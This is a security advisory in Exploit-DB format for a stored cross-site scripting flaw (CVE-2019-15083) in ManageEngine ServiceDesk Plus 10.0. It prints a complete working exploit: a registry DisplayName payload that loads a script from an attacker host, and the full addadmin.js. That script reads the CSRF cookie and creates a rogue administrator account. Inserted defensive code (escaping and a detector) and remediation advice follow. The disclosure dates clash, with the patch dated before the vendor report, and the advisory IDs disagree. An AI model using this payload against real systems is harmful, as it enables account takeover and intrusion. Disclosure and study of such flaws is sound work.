# Exploit Title: ManageEngine ServiceDesk 10.0 - Cross-Site Scripting
# Date: 2020-05-14
# Exploit Author: Felipe Molina (@felmoltor)
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/service-desk/download.html
# Version: 10.0 (10000.0.0.0)
# Tested on: Windows 10
# CVE: CVE-2019-15083

[SPUK-2020-05 / ManageEngine ServiceDesk XSS in remote IT Assets Management]
------------------------------

SECURITY ADVISORY: SPUK-2019-04 / ManageEngine ServiceDesk XSS in remote IT Assets Management

Affected Software: ManageEngine ServiceDesk Plus (version 10.0, installer version 10000.0.0.0, SHA1: 86EA684666CE85AF710CA9805B7FF37E3D4FD65D)
Vulnerability: Cross-Site Scripting
CVE: CVE-2019-15083
CVSSv3: 5.9 (CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N)
Severity: Medium
Release Date: 2020-05-14

I. Background
~~~~~~~~~~~~~

From ManageEngine's website:
"ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting to delivering awesome customer service. It provides great visibility and central control in dealing with IT issues to ensure that businesses suffer no downtime. For 10 years and running, it has been delivering smiles to millions of IT folks, end users, and stakeholders alike.

Version Enterprise: help desk + ITIL + asset + project

The complete ITIL ready ITSM suite with all features that an IT service desk needs.

* Incident management
* Problem management
* Change management
* IT project management
* Service catalog
* Asset management
* CMDB"
II. Description
~~~~~~~~~~~~~~~

From workstation administrator to ManageEngine administrator:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Default installations of "ManageEngine ServiceDesk Plus 10.0" were found to be vulnerable to a stored XSS injected by a local administrator of a managed workstation. Using the installed program names reported by the workstation as the vector, the local administrator can execute JavaScript code in the browser of the ManageEngine ServiceDesk administrator.

On "Asset Home > Server > <workstation> > software" the ManageEngine administrator can review what software is installed on the workstation. This table shows all the installed program names in the column "Software". In this field, and probably in others populated by the agent, a remote attacker can inject malicious markup that is executed when the ManageEngine administrator views the page.

In this case, the provided proof of concept creates an administrator user on ManageEngine ServiceDesk.
PoC:
~~~~

1. Access the workstation managed by ManageEngine with a local administrator account.
2. Open regedit.exe as administrator.
3. Navigate to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\<program>".
4. Change the current "DisplayName" to this value:

    test</a><script src=http://<attacker_ip>/addadmin.js type="text/javascript"/><a>bla

5. On the root of the <attacker_ip> web server, deploy the file "addadmin.js" with this content:

    // Form body of the "new technician" request, with the CSRF token left as a placeholder
    var createAdminParams = "sdpcsrfparam=<TOKEN>&mode=new&loginPermitted=null&loggedUserId=4&userID=-1&divToShow=listView&firstName=Legituser+4&middleName=L&lastName=Inocent+4&fullName=Legituser+4+L+Inocent+4&ciTypeId=6&ciId=null&employeeID=666&CI_BaseElement_IMPACTID=null&ciDescription=&ciName=Legituser+4+L+Inocent+4&email=&phone=&mobile=&smsID=&cost=0.00&deptName=None&reportingToid=&reportingTo=&jobTitle=&isSDSiteAdmin=false&associatedSites=null&projectrole=null&canApproveSR=false&approveLimitValue=&provideLogin=on&sdpAPIKey=&apiKeyExpiry=&userName=legituser4&addNewLogin=true&userPwd=legituser&confirmUserPwd=legituser&userDomain=None&isAdmin=SDAdmin&assignedRoles=2&dcRole=DCAdmin&froModuleForUDF=TECH&addButton=Save";

    // Save the CSRF cookie into a variable (the anti-CSRF token is readable from
    // document.cookie, so the injected script can copy it into the form body)
    var sdpcsrfcookie;
    var carr = document.cookie.split(";");
    for (var i = 0; i < carr.length; i++) {
        if (carr[i].split("=")[0].trim() == "sdpcsrfcookie") {
            sdpcsrfcookie = carr[i].split("=")[1].trim();
        }
    }

    if (sdpcsrfcookie === undefined) {
        console.log("No CSRF cookie was found. Aborting the PoC :-(");
    } else {
        // Same-origin POST sent with the administrator's session cookies
        var ajaxreq = new XMLHttpRequest();
        ajaxreq.open('POST', '/TechnicianDef.do');
        ajaxreq.withCredentials = true;
        ajaxreq.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml");
        ajaxreq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        console.log("Creating a new user on Manage Engine with CSRF token: " + sdpcsrfcookie);
        // Update the CSRF token parameter with the token present in the user cookie
        var params = createAdminParams.replace("<TOKEN>", sdpcsrfcookie);
        console.log("posting to create a new admin user: " + params);
        ajaxreq.send(params);
    }

6. Reboot the workstation to force the agent to update the program list.
7. Now, log in to ManageEngine ServiceDesk as the administrator.
8. Navigate to "Asset Home > Server > <workstation> > software".
9. Click on the "Next" button until the injected software name is shown in the table.
10. Now, go to "Admin > Users > Technicians" and verify that the administrator user "legituser4" has been created.
III. Impact
~~~~~~~~~~~

The XSS can be injected remotely from any workstation that is being managed by ManageEngine ServiceDesk, with no need for the attacker to access the web application. This PoC shows the creation of a ManageEngine administrator, but depending on how the service is configured it could potentially be used to create Domain Admin users, compromising the whole domain the workstation belongs to.

CVSS 3.0 Score:
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N

IV. Remediation
~~~~~~~~~~~~~~~

Sanitize all the input received from the remote agents before showing the values in the web page. Apply the usual XSS protections (output encoding for the HTML context the value is written into) also to values that are not entered directly through the application's web forms.
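The following is an added example, not code from the advisory or from ManageEngine, illustrating the remediation above with the advisory's own DisplayName payload. It contrasts the rendering behaviour the advisory describes (an agent-reported name concatenated into the table markup unchanged, here assumed to be wrapped in an anchor, which is why the payload closes an <a> first) with a hardened version that HTML-encodes every agent-supplied value, and adds a defender-side check that scans an inventory listing for names containing markup metacharacters. The inventory entries, the attacker host "attacker.example" and the anchor wrapper are constructed assumptions; the code runs under Node.js with no dependencies.

```javascript
// Added example (not from the advisory or ManageEngine): vulnerable vs. hardened
// rendering of agent-supplied software names, plus an inventory check.

// The DisplayName payload from the advisory's PoC, with a placeholder host.
// (constructed: the real PoC uses <attacker_ip>)
const PAYLOAD =
  'test</a><script src=http://attacker.example/addadmin.js type="text/javascript"/><a>bla';

// Encode the characters that change meaning in HTML text and attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// How the vulnerable page effectively behaves: the name reported by the agent is
// concatenated into the table row as-is. (The anchor wrapper is an assumption.)
function renderSoftwareRowUnsafe(name) {
  return '<tr><td><a href="#">' + name + "</a></td></tr>";
}

// Hardened form: every value that did not originate in the web tier is treated
// as untrusted and encoded for the context it is written into.
function renderSoftwareRowSafe(name) {
  return '<tr><td><a href="#">' + escapeHtml(name) + "</a></td></tr>";
}

// Defender check: a legitimate DisplayName never needs '<' or '>', so any
// inventory entry containing them deserves a look (and a check of the
// workstation's Uninstall registry keys).
function findSuspiciousNames(names) {
  return names.filter((n) => /[<>]/.test(n));
}

// Constructed sample inventory, not real agent data.
const SAMPLE_INVENTORY = [
  "Microsoft Visual C++ 2015 Redistributable (x64)",
  "7-Zip 19.00 (x64 edition)",
  PAYLOAD,
];

if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe :", renderSoftwareRowUnsafe(PAYLOAD));
  console.log("safe   :", renderSoftwareRowSafe(PAYLOAD));
  console.log("flagged:", findSuspiciousNames(SAMPLE_INVENTORY));
}
```

The unsafe row reproduces a live `<script>` element pointing at the attacker's host; the safe row renders the same bytes as inert text. The inventory check is the quick triage an administrator can run over an export of the software table to find workstations whose registry has already been tampered with.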
V. Disclosure
~~~~~~~~~~~~~

Reported By: Felipe Molina de la Torre (Felipe(at)SensePost.com)
Vendor Informed: 2019-04-30
Patch Release Date: 2019-04-16
Public Ack. of the vuln: 2020-05-13
Advisory Release Date: 2020-05-14

---------------------------------[SPUK-2020-05 / ManageEngine ServiceDesk XSS in remote IT Assets Management]---